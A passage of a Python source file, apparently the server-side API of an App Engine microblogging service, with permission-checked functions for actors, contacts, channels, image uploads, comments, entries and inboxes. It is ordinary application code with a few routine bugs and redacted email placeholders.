'type': 'user',
'extra': {'icon': '/images/avatar_23132412',
'given_name': 'Test',
'family_name': 'User'
}
}
}
}
"""
nick = clean.nick(nick)
if not nick:
raise exception.ApiException(0x00, "Invalid nick")
not_found_message = 'Actor not found: %s' % nick
key_name = Actor.key_from(nick=nick)
actor_ref = Actor.get_by_key_name(key_name)
if not actor_ref:
raise exception.ApiNotFound(not_found_message)
if actor_ref.is_deleted():
raise exception.ApiDeleted(not_found_message)
if actor_can_view_actor(api_user, actor_ref):
return ResultWrapper(actor_ref, actor=actor_ref)
# TODO(termie): do we care about permissions here?
# the receiver of this instance can make modifications
# but this is currently necessary to update the
# follower / contact counts
return ResultWrapper(actor_ref, actor=actor_ref.to_api_limited())
# depends on actor_get privacy
def actor_get_actors(api_user, nicks):
o = {}
nicks = list(set(nicks))
if not nicks:
return o
for nick in nicks:
try:
actor = actor_get(api_user, nick)
except exception.ApiException:
actor = None
except exception.ValidationError:
logging.warn('Validation error for nick: %s' % nick)
actor = None
o[nick] = actor
return o
@public_owner_or_contact
def actor_get_channels_admin(api_user, nick, limit=48, offset=None):
"""returns the channels the given actor is a member of"""
nick = clean.nick(nick)
query = Relation.gql('WHERE target = :1 AND relation = :2 AND owner > :3',
nick,
'channeladmin',
offset)
rv = query.fetch(limit)
return [x.owner for x in rv]
@public_owner_or_contact
def actor_get_channels_member(api_user, nick, limit=48, offset=None):
"""returns the channels the given actor is a member of"""
query = Relation.gql('WHERE target = :1 AND relation = :2 AND owner > :3',
nick,
'channelmember',
offset)
rv = query.fetch(limit)
return [x.owner for x in rv]
@public_owner_or_contact
def actor_get_contacts(api_user, nick, limit=48, offset=None):
"""returns the contacts for the given actor if current_actor can view them"""
query = Relation.gql('WHERE owner = :1 AND relation = :2 AND target > :3',
nick,
'contact',
offset)
results = query.fetch(limit)
return [x.target for x in results]
@owner_required
def actor_get_contacts_since(api_user, nick, limit=30, since_time=None):
"""returns the contacts for the given actor if current_actor can view them"""
query = Relation.gql('WHERE owner = :1 AND relation = :2 AND target > :3',
nick,
'contact',
offset)
results = query.fetch(limit)
return [x.target for x in results]
@owner_required
def actor_get_contacts_avatars_since(api_user, nick, limit=30, since_time=None):
"""returns the avatars of contacts for the given actor"""
limit = int(limit)
contacts = actor_get_contacts(api_user, nick, limit)
contacts.append(nick)
contacts_ref = actor_get_actors(api_user, contacts)
results = []
if since_time is not None:
since_time = clean.datetime(since_time)
for contact_ref in contacts_ref.values():
if contact_ref:
if not since_time or contact_ref.avatar_updated_at > since_time:
results.append(contact_ref)
return ResultWrapper(results, contacts=results)
@public_owner_or_contact
def actor_get_followers(api_user, nick, limit=48, offset=None):
"""returns the followers for the given actor if current_actor can view them"""
query = Relation.gql('WHERE target = :1 AND relation = :2 AND owner > :3',
nick,
'contact',
offset)
results = query.fetch(limit)
return [x.owner for x in results]
def actor_get_safe(api_user, nick):
try:
return actor_get(api_user, nick)
except exception.ApiException:
return None
@public_owner_or_contact
def actor_has_contact(api_user, owner, target):
key_name = Relation.key_from(relation='contact', owner=owner, target=target)
return Relation.get_by_key_name(key_name)
def actor_lookup_email(api_user, email):
""" Lookup an actor based on an email address,
useful for determining if an email address is available
PARAMETERS:
email - email alias
RETURNS: actor_ref
"""
query = Relation.gql("WHERE target = :1 AND relation = 'email'",
email)
for rel_ref in query:
actor_ref = actor_get_safe(api_user, rel_ref.owner)
if actor_ref:
return actor_ref
return None
def actor_lookup_im(api_user, im):
query = Relation.gql('WHERE relation = :1 AND target = :2',
'im_account',
im)
rel_ref = query.get()
if not rel_ref:
return None
else:
return actor_get(api_user, rel_ref.owner)
def actor_lookup_mobile(api_user, mobile):
mobile = clean.mobile(mobile)
query = Relation.gql("WHERE target = :1 AND relation = 'mobile'",
mobile)
for rel_ref in query:
actor_ref = actor_get_safe(api_user, rel_ref.owner)
if actor_ref:
return actor_ref
return None
def actor_lookup_nick(api_user, nick):
""" lookup actor based on normalized version of the nick """
actor_ref = actor_get_safe(api_user, nick)
if actor_ref:
return actor_ref
nick = clean.normalize_nick(clean.nick(nick))
query = Actor.gql('WHERE normalized_nick = :1',
nick)
actor_ref = query.get()
if not actor_ref:
return None
return actor_get_safe(api_user, actor_ref.nick)
@delete_required
@owner_required
def actor_remove(api_user, nick):
"""Mark the specified actor for deletion."""
actor_ref = actor_get(api_user, nick)
if actor_ref:
actor_ref.mark_as_deleted()
return True
return False
@delete_required
@owner_required
def actor_remove_contact(api_user, owner, target):
owner_ref = actor_get(api_user, owner)
target_ref = actor_get(api_user, target)
# XXX start transaction
# Delete the relationship
key_name = Relation.key_from(relation='contact',
owner=owner_ref.nick,
target=target_ref.nick)
rel = Relation.get_by_key_name(key_name)
if not rel:
raise exception.ApiException(
0, 'Cannot remove a relationship that does not exist')
rel.delete()
# Decrease the counts for each
owner_ref.extra.setdefault('contact_count', 1)
owner_ref.extra['contact_count'] -= 1
owner_ref.put()
target_ref.extra.setdefault('follower_count', 1)
target_ref.extra['follower_count'] -= 1
target_ref.put()
# Unsubscribe owner from all of target's streams
streams = stream_get_actor(ROOT, target)
for stream in streams:
sub = subscription_remove(ROOT,
topic=stream.key().name(),
target='inbox/%s/overview' % owner)
# If owner is private mark all subscriptions to her streams as pending
if owner_ref.privacy < PRIVACY_PUBLIC:
streams = stream_get_actor(api_user, owner)
for stream in streams:
sub_ref = subscription_get(ROOT,
topic=stream.key().name(),
target='inbox/%s/overview' % target)
if sub_ref:
sub_ref.state = "pending"
sub_ref.put()
# XXX end transaction
return rel
@admin_required
def actor_update_intermediate_password(api_user, nick, password):
actor_ref = actor_get(api_user, nick)
actor_ref.password = util.hash_password(nick, password)
actor_ref.put()
return actor_ref
#######
#######
#######
@owner_required
def avatar_clear_actor(api_user, nick):
actor_ref = actor_get(ROOT, nick)
actor_ref.extra['icon'] = util.DEFAULT_AVATAR_PATH
actor_ref.avatar_updated_at = utcnow()
actor_ref.put()
return True
@owner_required
def avatar_set_actor(api_user, nick, path):
"""sets the avatar path for a given user"""
validate.avatar_path(path)
actor_ref = actor_get(ROOT, nick)
actor_ref.extra['icon'] = path
actor_ref.avatar_updated_at = utcnow()
actor_ref.put()
return True
@throttled(minute=5, hour=30)
@owner_required
@catch_image_error
def avatar_upload(api_user, nick, content):
""" accept uploaded binary content, save an original and
make a few smaller sizes, assign the proper fields to the user
"""
nick = clean.nick(nick)
resized = {'original': content}
# Crop to a square
jpeg = images.crop(content,
0.0, 0.0, 1.0, 1.0,
output_encoding = images.JPEG)
original_size = imageutil.size_from_jpeg(jpeg)
if original_size and original_size[0] != original_size[1]:
dimension = min(original_size)
crop_to = _crop_to_square(original_size, (dimension, dimension))
content = images.crop(content, output_encoding=images.JPEG,
*crop_to)
# note: we only support JPEG format at the moment
for size, dimensions in AVATAR_IMAGE_SIZES.items():
resized[size] = images.resize(content, output_encoding=images.JPEG,
*dimensions)
path_uuid = util.generate_uuid()
# XXX begin transaction
for img_size, img_data in resized.iteritems():
path = 'avatar_%s_%s' % (path_uuid, img_size)
# TODO: Check for hash collisions before uploading (!!)
img_ref = image_set(api_user,
nick,
path=path,
content=content,
format='jpg',
size=img_size)
# XXX end transaction
# TODO(termie): this returns somewhat differently than background_upload below,
return '%s/avatar_%s' % (nick, path_uuid)
#######
#######
#######
@owner_required
def background_clear_actor(api_user, nick):
actor_ref = actor_get(ROOT, nick)
actor_ref.extra.pop('bg_image', '')
actor_ref.extra.pop('bg_color', '')
actor_ref.extra.pop('bg_repeat', '')
actor_ref.put()
return True
@owner_required
def background_set_actor(api_user, nick, path=None, color=None, repeat=None):
"""sets the backgorund info for a given user"""
path = clean.bg_image(path)
color = clean.bg_color(color)
repeat = clean.bg_repeat(repeat)
actor_ref = actor_get(ROOT, nick)
if path:
actor_ref.extra['bg_image'] = path
if color:
actor_ref.extra['bg_color'] = color
if repeat:
actor_ref.extra['bg_repeat'] = repeat
actor_ref.put()
return True
@throttled(minute=5, hour=30)
@owner_required
@catch_image_error
def background_upload(api_user, nick, content):
""" accept uploaded binary content, save an original and
make a few smaller sizes, assign the proper fields to the user
"""
nick = clean.nick(nick)
# XXX begin transaction
img = images.Image(content)
# note: only supporting JPEG format
#img_data = img.execute_transforms(output_encoding=images.JPEG)
img_data = images.horizontal_flip(content, output_encoding=images.JPEG)
img_data = images.horizontal_flip(img_data, output_encoding=images.JPEG)
path_uuid = util.generate_uuid()
path = 'bg_%s' % (path_uuid)
# TODO: Check for hash collisions before uploading (!!)
img_ref = image_set(api_user,
nick,
path=path,
format='jpg',
content=content)
# XXX end transaction
# TODO(termie): this returns somewhat differently than avatar_upload above,
return '%s/bg_%s.jpg' % (nick, path_uuid)
#######
#######
#######
def channel_browse(api_user, limit, offset_channel_nick=''):
"""Return all channels.
PARAMETERS:
limit - Number of results to retrieve
offset_channel_nick - Retrieve channels with nick > this value.
"""
# Sort by nick, so that filtering works.
query = Actor.gql('WHERE type = :1 AND deleted_at = :2 and nick > :3 '
'ORDER BY nick',
'channel',
None,
offset_channel_nick)
# Limit to the range specified:
if offset_channel_nick:
logging.info('offset: ' + offset_channel_nick)
results = query.fetch(limit)
return results
def channel_browse_recent(api_user, limit=48, offset=None):
pass
@throttled(minute=2, hour=10, month=50)
@write_required
def channel_create(api_user, **kw):
channel_nick = clean.channel(kw.get('channel'))
creator_nick = kw.get('nick')
params = {'nick': channel_nick,
'normalized_nick': channel_nick.lower(),
'privacy': kw.get('privacy', PRIVACY_PUBLIC),
'type': 'channel',
'password': '',
'extra': {'description': kw.get('description', ''),
'member_count': 0,
'admin_count': 0,
},
}
creator_ref = actor_get(api_user, creator_nick)
if not actor_owns_actor(api_user, creator_ref):
raise exception.ApiException(
0x00, "Not allowed to act on behalf of this user")
try:
existing_ref = channel_get(ROOT, channel_nick)
except exception.ApiDeleted:
existing_ref = True
except exception.ApiNotFound:
existing_ref = False
if existing_ref:
raise exception.ApiException(
0x00, 'Name of the channel is already in use: %s' % channel_nick)
if creator_ref.is_channel():
raise exception.ApiException(0x00, 'Channels cannot create other channels')
admin_channels = actor_get_channels_admin(api_user, creator_ref.nick)
if len(admin_channels) >= MAX_ADMINS_PER_ACTOR:
raise exception.ApiException(
0x00, 'Only allowed to admin %d channels' % MAX_ADMINS_PER_ACTOR)
# also create a list of administrators and members
# TODO allow some of these to be specified as parameters
admins = [creator_ref.nick]
for admin in admins:
params['extra']['admin_count'] += 1
# XXX start transaction
channel_ref = Actor(**params)
channel_ref.put()
relation = 'channeladmin'
rel_ref = Relation(owner=channel_ref.nick,
relation=relation,
target=creator_ref.nick,
)
rel_ref.put()
# create the presence stream for the channel
stream_ref = stream_create_presence(api_user,
channel_ref.nick,
read_privacy=PRIVACY_PUBLIC,
write_privacy=PRIVACY_CONTACTS)
channel_join(api_user, creator_nick, channel_nick)
# XXX end transaction
return channel_ref
@public_owner_or_member
def channel_get(api_user, channel):
"""Retrieve the specified channel, if it has not been deleted.
PAREMTETRS:
api_user - (the usual)
channel - Nick of channel to retrieve
RETURNS: Channel object
THROWS: ApiExceptioon
"""
not_found_message = 'Channel not found: %s' % channel
channel = clean.channel(channel)
key_name = Actor.key_from(nick=channel)
channel_ref = Actor.get_by_key_name(key_name)
if not channel_ref:
raise exception.ApiNotFound(not_found_message)
if channel_ref.is_deleted():
raise exception.ApiDeleted(not_found_message)
return channel_ref
@public_owner_or_member
def channel_get_admins(api_user, channel, limit=24):
query = Relation.gql('WHERE owner = :1 AND relation = :2',
channel,
'channeladmin')
return [a.target for a in query.fetch(limit)]
# depends on channel_get's privacy
def channel_get_channels(api_user, channels):
"""Retrieve the specified channels, filtering out those which have been
deleted.
PARAMETERS:
api_user - (the usual)
channels - [nick] - List of channel nicks, will be keys in the dictionary
returned
RETURNS: { channel_nick : channel_obj }
Where channel_obj may be None if the channel does not exist.
channel_nick are the keys passed as a parameter.
"""
channel_refs = {}
channels = list(set(channels))
if not channels:
return channel_refs
for nick in channels:
channel = channel_get_safe(api_user, nick)
# Will be set to None if the channel doesn't exist (or was deleted)
channel_refs[nick] = channel
return channel_refs
@public_owner_or_member
def channel_get_members(api_user, channel, limit=24, offset=None):
query = Relation.gql('WHERE owner = :1 AND relation = :2 AND target > :3',
channel,
'channelmember',
None)
return [a.target for a in query.fetch(limit)]
def channel_get_safe(api_user, channel):
"""Retrieve the specified channel, if it has not been deleted.
PAREMTETRS:
api_user - (the usual)
channel - Nick of channel to retrieve
RETURNS: Channel object or None
"""
try:
channel_ref = channel_get(api_user, channel)
except exception.ApiException:
return None
return channel_ref
@public_owner_or_member
def channel_has_admin(api_user, channel, nick):
key_name = Relation.key_from(relation='channeladmin',
owner=channel,
target=nick)
admin_ref = Relation.get_by_key_name(key_name)
if admin_ref:
return True
return False
@public_owner_or_member
def channel_has_member(api_user, channel, nick):
key_name = Relation.key_from(relation='channelmember',
owner=channel,
target=nick)
member_ref = Relation.get_by_key_name(key_name)
if member_ref:
return True
return False
@throttled(minute=10, hour=50, day=100, month=200)
@owner_required
def channel_join(api_user, nick, channel):
channel_ref = channel_get(api_user, channel)
actor_ref = actor_get(api_user, nick)
if channel_has_member(api_user, channel_ref.nick, actor_ref.nick):
raise exception.ApiException(0x00, "already a member")
# XXX start transaction
relation = 'channelmember'
rel = Relation(owner=channel_ref.nick,
relation=relation,
target=actor_ref.nick,
)
rel.put()
# TODO probably a race-condition
channel_ref.extra['member_count'] += 1
channel_ref.put()
streams = stream_get_actor(ROOT, channel)
for stream in streams:
sub = subscription_request(api_user,
topic=stream.key().name(),
target='inbox/%s/overview' % actor_ref.nick)
# XXX end transaction
return rel
@owner_required
def channel_part(api_user, nick, channel):
# XXX start transaction
channel_ref = channel_get(api_user, channel)
actor_ref = actor_get(api_user, nick)
if not channel_has_member(api_user, channel_ref.nick, actor_ref.nick):
raise exception.ApiException(0x00, "not a member")
key_name = Relation.key_from(relation='channelmember',
owner=channel_ref.nick,
target=actor_ref.nick)
rel_ref = Relation.get_by_key_name(key_name)
rel_ref.delete()
channel_ref.extra['member_count'] -= 1
channel_ref.put()
# Unsubscribe owner from all of target's streams
streams = stream_get_actor(ROOT, channel)
for stream in streams:
sub = subscription_remove(ROOT,
topic=stream.key().name(),
target='inbox/%s/overview' % actor_ref.nick)
# XXX end transaction
return rel_ref
@throttled(minute=10, hour=100, day=300, month=1000)
@write_required
@owner_required
def channel_post(api_user, **kw):
# grab the params we're interested in
message = kw.get('message', kw.get('title', '')) # legacy compat
location = kw.get('location', '')
icon = clean.icon(kw.get('icon', 0))
uuid = kw.get('uuid', util.generate_uuid())
channel = kw.get('channel', None)
nick = kw.get('nick', None)
validate.length(message, 0, MAX_POST_LENGTH)
validate.location(location)
validate.user_nick(nick)
validate.uuid(uuid)
channel = clean.channel(channel)
# check whether the channel exists, we're probably going to make
# it if it doesn't
channel_ref = channel_get_safe(api_user, channel)
actor_ref = actor_get(api_user, nick)
if not channel_ref:
channel_ref = channel_create(api_user, nick=nick, channel=channel)
# join the channel if we aren't a member, if this fails we can't post
if not channel_has_member(api_user, channel_ref.nick, actor_ref.nick):
channel_join(api_user, actor_ref.nick, channel_ref.nick)
# we've decided this is a presence update
stream = stream_get_presence(api_user, channel)
values = {
'stream': stream.key().name(),
'uuid': uuid,
'owner': stream.owner,
'actor': actor_ref.nick,
'extra': {
'title': message,
'location': location,
'icon': icon,
}
}
# XXX start transaction
#presence = _set_presence(**values)
entry = _add_entry(stream, new_values=values)
subscribers = _subscribers_for_entry(stream, entry)
inboxes = _add_inboxes_for_entry(subscribers, stream, entry)
_notify_subscribers_for_entry(subscribers, actor_ref, stream, entry)
# XXX end transaction
return entry
@owner_required
def channel_update(api_user, channel, **kw):
allowed_attributes = ['external_url',
'description',
]
channel_ref = channel_get(api_user, channel)
for k, v in kw.iteritems():
if k not in allowed_attributes:
continue
if k == 'external_url' and v:
v = clean.url(v)
channel_ref.extra[k] = v
channel_ref.put()
return channel_ref
#######
#######
#######
@admin_required
def email_associate(api_user, nick, email):
actor_ref = actor_get(api_user, nick)
# XXX start transaction
if actor_lookup_email(api_user, email):
raise exception.ApiException(0x00, 'Email alias already in use')
# clear old email addresses
# TODO(termie): support multiple email addresses
old_query = Relation.gql('WHERE owner = :1 AND relation = :2',
actor_ref.nick,
'email')
for rel_ref in old_query:
rel_ref.delete()
relation_ref = Relation(owner=actor_ref.nick,
relation='email',
target=email,
)
relation_ref.put()
# XXX end transaction
return relation_ref
@owner_required
def email_get_actor(api_user, nick):
nick = clean.nick(nick)
query = Relation.gql('WHERE owner = :1 AND relation = :2',
nick,
'email')
rel_ref = query.get()
if rel_ref:
return rel_ref.target
return None
# To prevent circular dependency from common.mail to common.api.admin_requred
# we use these simple wrapper functions for email sending.
@admin_required
def email_mass_send(api_user, message_tuples):
mail.mass_send(message_tuples)
@admin_required
def email_send(api_user, email, subject, message, on_behalf=None, html_message=None):
mail.send(email, subject, message, on_behalf=on_behalf, html_message=html_message)
#######
#######
#######
@write_required
@owner_required
@public_owner_or_contact_by_entry
def entry_add_comment(api_user, _task_ref=None, **kw):
""" Add a comment to given entry
PARAMS:
* _task_ref - admin-only, task to resume
* content - the text content of the commment
* stream - the stream in which the entry this comment is on resides
* entry - the entry this comment is on
* uuid - a unique identifier for this comment
* nick - the actor making the comment
RETURNS: comment_ref
EXAMPLE API RETURN:
::
{'status': 'ok',
'rv': {'comment': {'stream': 'stream/[email protected]/comments',
'uuid': '1234567890abcdef',
'entry': 'stream/[email protected]/presence/12345',
'owner': '<EMAIL>',
'actor': '<EMAIL>',
'extra': {'content': 'a comment!',
'entry_stream': 'stream/[email protected]/presence',
'entry_title': 'please comment on me',
'entry_actor': '<EMAIL>',
'entry_uuid': '12345',
}
}
}
}
"""
content = kw.get('content', '')
stream = kw.get('stream')
entry = kw.get('entry')
uuid = kw.get('uuid', util.generate_uuid())
nick = clean.nick(kw.get('nick', ''))
try:
validate.length(content, 1, settings.MAX_COMMENT_LENGTH)
validate.stream(stream)
validate.entry(entry)
validate.uuid(uuid)
except exception.ValidationError, e:
raise exception.ApiException(0x00, e.user_message)
if settings.QUEUE_ENABLED:
task_ref = _task_ref
if not task_ref:
kw['uuid'] = uuid
task_ref = task_get_or_create(api_user,
nick,
'entry_add_comment',
uuid,
kw=kw)
actor_ref = actor_get(api_user, nick)
comment_stream_ref = stream_get_comment(api_user, actor_ref.nick)
stream_ref = stream_get(api_user, stream)
entry_ref = entry_get(api_user, entry)
values = {"stream": comment_stream_ref.key().name(),
"uuid": uuid,
"entry": entry_ref.key().name(),
"owner": stream_ref.owner,
"actor": actor_ref.nick,
"extra": {"content": content,
"entry_stream": stream_ref.key().name(),
"entry_stream_type": stream_ref.type,
"entry_title": entry_ref.extra.get('title', None),
"entry_actor": entry_ref.actor,
"entry_uuid": entry_ref.uuid,
},
}
if settings.QUEUE_ENABLED:
try:
comment_ref = _process_new_entry_with_progress(
task_ref,
actor_ref,
new_stream_ref=comment_stream_ref,
entry_stream_ref=stream_ref,
entry_ref=entry_ref,
new_values=values
)
except exception.ApiException:
# Something is wrong, bail out and delete the task
task_ref.delete()
raise
else:
comment_ref = _add_entry(comment_stream_ref,
new_values=values,
entry_ref=entry_ref)
subscribers = _subscribers_for_comment(comment_stream_ref, stream_ref,
entry_ref, comment_ref)
inboxes = _add_inboxes_for_entry(subscribers, comment_stream_ref,
comment_ref)
_notify_subscribers_for_comment(actor_ref, comment_ref, entry_ref)
return ResultWrapper(comment_ref, comment=comment_ref)
def entry_add_comment_with_entry_uuid(api_user, **kw):
"""For DJabberd"""
entry_uuid = kw.pop('entry_uuid')
entry_ref = entry_get_uuid(api_user, entry_uuid)
if not entry_ref:
raise exception.ApiException(
0x00,
'No entry with uuid %s' % entry_uuid)
kw['stream'] = entry_ref.stream
kw['entry'] = entry_ref.keyname()
return entry_add_comment(api_user, **kw)
@public_owner_or_contact_by_entry
def entry_get(api_user, entry):
entry_ref = StreamEntry.get_by_key_name(entry)
not_found_message = 'Entry not found: %s' % entry
if not entry_ref:
raise exception.ApiNotFound(not_found_message)
if entry_ref.is_deleted():
raise exception.ApiDeleted(not_found_message)
try:
# if this is a comment ensure that the parent exists
if entry_ref.entry:
# A comment
parent_entry = entry_get(api_user, entry_ref.entry)
# ensure the author exists
actor_get(api_user, entry_ref.actor)
# and the stream
stream_get(api_user, entry_ref.stream)
# and the owner
actor_get(api_user, entry_ref.owner)
except exception.ApiDeleted:
raise exception.ApiDeleted(not_found_message)
except exception.ApiNotFound:
raise exception.ApiNotFound(not_found_message)
return entry_ref
@public_owner_or_contact_by_entry
def entry_get_comments(api_user, entry):
entry_ref = entry_get_safe(api_user, entry)
if not entry_ref:
return None
query = InboxEntry.gql('WHERE inbox = :1 ORDER BY created_at',
entry_ref.key().name() + '/comments')
comment_keys = [c.stream_entry_keyname() for c in query]
return entry_get_entries(api_user, comment_keys)
# Relies on ACLs on the called functions
def entry_get_comments_with_entry_uuid(api_user, entry_uuid):
entry_ref = entry_get_uuid(api_user, entry_uuid)
if not entry_ref:
return None
query = InboxEntry.gql('WHERE inbox = :1 ORDER BY created_at',
entry_ref.key().name() + '/comments')
comment_keys = [c.stream_entry_keyname() for c in query]
comments = entry_get_entries(api_user, comment_keys)
return ResultWrapper(comments, comments=comments, entry=entry_ref)
def entry_get_entries(api_user, entries):
"""Turn a list of entry keys to a list of entries,
maintaining the order.
The list only contains values where entries
(and their parent entities) exist.
"""
out = list()
if not entries:
return out
entries_dict = entry_get_entries_dict(api_user, entries)
for entry_key in entries:
entry = entries_dict.get(entry_key, None)
if entry:
out.append(entry)
return out
def entry_get_entries_dict(api_user, entries):
"""Turn a list of entry keys to a dictionary of entries.
The dictionary only contains values for keys where entries
(and their parent entities) exist.
"""
out = {}
if not entries:
return out
entries = list(set(entries))
for entry in entries:
entry_ref = entry_get_safe(api_user, entry)
if entry_ref:
out[entry] = entry_ref
return out
def entry_get_inbox_since(api_user, inbox, limit=30, since_time=None):
inbox = inbox_get_entries_since(
api_user, inbox, limit=limit, since_time=since_time)
entries = entry_get_entries(api_user, inbox)
return ResultWrapper(entries, entries=entries)
def entry_get_inbox(api_user, inbox, limit=30, offset=None):
inbox = inbox_get_entries_since(api_user, inbox, limit=limit, offset=offset)
return entry_get_entries(api_user, inbox)
@owner_required
def entry_get_actor_overview(api_user, nick, limit=30, offset=None):
""" Get entries for a user's overview
PARAMS:
* nick - the actor for whom to fetch the overview
* limit - how many entries to fetch, max 100
* offset - a datetime before which to retrieve entries
RETURNS: [entry_ref1, entry_ref2, ...]
"""
nick = clean.nick(nick)
inbox = 'inbox/%s/overview' % nick
return entry_get_inbox(api_user, inbox, limit=limit, offset=offset)
@owner_required
def entry_get_actor_overview_since(api_user, nick, limit=30, since_time=None):
""" Get entries for a user's overview since a certain time
This is a useful call if you are trying to periodically poll to keep
up to date as it is more efficient for you to only get the updates since
some time near the last time you get an entry.
PARAMS:
* nick - the actor for whom to fetch the overview
* limit - how many entries to fetch, max 100
* since_time - a datetime after which to retrieve entries
RETURNS: [entry_ref1, entry_ref2, ...]
"""
nick = clean.nick(nick)
inbox = 'inbox/%s/overview' % nick
return entry_get_inbox_since(
api_user, inbox, limit=limit, since_time=since_time)
@public_owner_or_contact_by_stream
def entry_get_last(api_user, stream):
""" Queries the StreamEntry entities to find the last StreamEntry
for the given stream.
"""
query = StreamEntry.gql('WHERE stream = :1 ORDER BY created_at DESC',
stream)
entry_ref = query.get()
if not entry_ref:
return None
return entry_get(api_user, entry_ref.key().name())
def entry_get_uuid(api_user, uuid):
""" Queries the StreamEntry entities to find the StreamEntry corresponding to
given uuid.
"""
entry_ref = StreamEntry.gql("WHERE uuid = :1", uuid).get()
if not entry_ref:
return None
if not actor_can_view_entry(api_user, entry_ref):
raise exception.ApiException(exception.PRIVACY_ERROR,
'You are not allowed to view this entry')
return entry_get(api_user, entry_ref.key().name())
def entry_get_safe(api_user, entry):
"""Like entry_get, but returns None for entries you don't have rights to see
rather than throwing an exception.
"""
try:
entry_ref = entry_get(api_user, entry)
except exception.ApiException:
return None
return entry_ref
@write_required
def entry_mark_as_spam(api_user, entry):
""" TODO(termie): helper call so that I don't have to drastically change some old
apis in template code """
return abuse_report_entry(api_user, api_user.nick, entry)
@delete_required
@owner_required_by_entry
def entry_remove(api_user, entry):
entry_ref = StreamEntry.get_by_key_name(entry)
if not entry_ref:
raise exception.ApiException(0x00, "Invalid post, not found")
if entry_ref.entry:
raise exception.ApiException(0x00, "Cannot call entry_remove on a comment")
entry_ref.mark_as_deleted()
@delete_required
@owner_required_by_entry
def entry_remove_comment(api_user, comment):
# XXX start transaction
comment_ref = StreamEntry.get_by_key_name(comment)
if not comment_ref:
raise exception.ApiException(0x00, "Invalid comment, not found")
if not comment_ref.entry:
raise exception.ApiException(
0x00,
"Cannot call entry_remove_comment on something that is not a comment")
entry_ref = entry_get(api_user, comment_ref.entry)
entry_ref.extra.setdefault('comment_count', 0)
if entry_ref.extra['comment_count'] > 0:
entry_ref.extra['comment_count'] -= 1
entry_ref.put()
comment_ref.mark_as_deleted()
# XXX end transaction
#######
#######
#######
@owner_required
def keyvalue_get(api_user, nick, keyname):
if not keyname:
return None
nick = clean.nick(nick)
key_name = KeyValue.key_from(actor=nick, keyname=keyname)
return KeyValue.get_by_key_name(key_name)
@owner_required
def keyvalue_prefix_list(api_user, nick, keyname):
if not keyname:
return ResultWrapper(keyvalues, keyvalues=None)
nick = clean.nick(nick)
key_name_lower = unicode(keyname)
key_name_upper = key_name_lower + "\<KEY>".decode('utf-8')
keyvalues = KeyValue.gql(u"WHERE actor = :1 AND keyname >= :2 AND keyname < :3",
nick,
key_name_lower,
key_name_upper).fetch(1000)
return ResultWrapper(keyvalues, keyvalues=keyvalues)
@write_required
@owner_required
def keyvalue_put(api_user, nick, keyname, value):
if not nick:
return None
if not keyname:
return None
nick = clean.nick(nick)
params = {'actor': nick,
'keyname': keyname,
'value': value,
}
keyvalue = KeyValue(**params)
keyvalue.put()
return keyvalue
#######
#######
#######
@admin_required
def im_associate(api_user, nick, im):
actor_ref = actor_get(ROOT, nick)
rel_ref = Relation(owner=nick,
relation='im_account',
target=im,
)
rel_ref.put()
return rel_ref
@admin_required
def im_disassociate(api_user, nick, im):
actor_ref = actor_get(ROOT, nick)
key_name = Relation.key_from(relation='im_account',
owner=nick,
target=im)
rel_ref = Relation.get_by_key_name(key_name)
rel_ref.delete()
return
@owner_required
def im_get_actor(api_user, nick):
"""Given a nick, retrieve the IM alias (or None)
RETURNS: xmpp.JID()
"""
nick = clean.nick(nick)
query = Relation.gql('WHERE owner = :1 AND relation = :2',
nick,
'im_account')
rel_ref = query.get()
if rel_ref:
return xmpp.JID.from_uri(rel_ref.target)
return None
#######
#######
#######
def image_get(api_user, nick, path, format='jpg'):
keyname = 'image/%s/%s.%s' % (nick, path, format)
image_ref = Image.get_by_key_name(keyname)
# LEGACY COMPAT
if not image_ref:
actor_ref = actor_get(ROOT, nick)
image_ref = Image.get_by_key_name(keyname,
parent=actor_ref.key())
return image_ref
@public_owner_or_contact
def image_get_all_keys(api_user, nick, size):
"""Given an actor, retrieve keynames"""
query = Image.gql('WHERE actor = :1 AND size = :2', nick, size)
return list(query.run())
@public_owner_or_contact
def image_set(api_user, nick, path, content, format='jpg', size=None):
nick = clean.nick(nick)
params = {'key_name': 'image/%s/%s.%s' % (nick, path, format),
'actor': 'actor/%s' % nick,
'content': db.Blob(content),
}
if size is not None:
params['size'] = size
image_ref = Image(**params)
image_ref.put()
return image_ref
#######
#######
#######
@admin_required
def inbox_copy_entries(api_user, target, nick, limit=5):
"""Add recent inbox entries from user (target) to user (nick)'s inbox.
"""
target = clean.nick(target)
nick = clean.nick(nick)
limit = clean.limit(limit)
inbox = 'inbox/%s/public' % target
query = InboxEntry.Query().filter('inbox =', inbox).order('-created_at')
results = query.fetch(limit=limit)
for entry in results:
inbox_item = 'inbox/%s/overview' % nick
if inbox_item not in entry.inbox:
entry.inbox.append(inbox_item)
entry.put()
return
@public_owner_or_contact
def inbox_get_actor_contacts(api_user, nick, limit=5, offset=None,
stream_type=None):
nick = clean.nick(nick)
inbox = 'inbox/%s/contacts' % nick
return inbox_get_entries(api_user, inbox, limit, offset, stream_type)
@owner_required
def inbox_get_actor_overview(api_user, nick, limit=5, offset=None,
stream_type=None):
nick = clean.nick(nick)
inbox = 'inbox/%s/overview' % nick
return inbox_get_entries(api_user, inbox, limit, offset, stream_type)
@owner_required
def inbox_get_actor_private(api_user, nick, limit=5, offset=None,
stream_type=None):
nick = clean.nick(nick)
inbox = 'inbox/%s/private' % nick
return inbox_get_entries(api_user, inbox, limit, offset)
def inbox_get_actor_public(api_user, nick, limit=5, offset=None,
stream_type=None):
nick = clean.nick(nick)
inbox = 'inbox/%s/public' % nick
return inbox_get_entries(api_user, inbox, limit, offset, stream_type)
def inbox_get_entries(api_user, inbox, limit=30, offset=None,
stream_type=None):
limit = clean.limit(limit)
query = InboxEntry.Query().filter('inbox =', inbox).order('-created_at')
if offset is not None:
offset = clean.datetime(offset)
query.filter('created_at <=', offset)
if stream_type is not None:
query.filter('stream_type =', stream_type)
results = query.fetch(limit=limit)
return [x.stream_entry_keyname() for x in results]
def inbox_get_entries_since(api_user, inbox, limit=30, since_time=None,
stream_type=None):
limit = clean.limit(limit)
query = InboxEntry.Query().filter('inbox =', inbox).order('created_at')
if since_time is not None:
since_time = clean.datetime(since_time)
query.filter('created_at >=', since_time)
if stream_type is not None:
query.filter('stream_type =', stream_type)
results = query.fetch(limit=limit)
return [x.stream_entry_keyname() for x in results]
def inbox_get_explore(api_user, limit=30, offset=None):
inbox = 'inbox/%s/explore' % ROOT.nick
return inbox_get_entries(api_user, inbox, limit, offset)
#######
#######
#######
@owner_required
def invite_accept(api_user, nick, code):
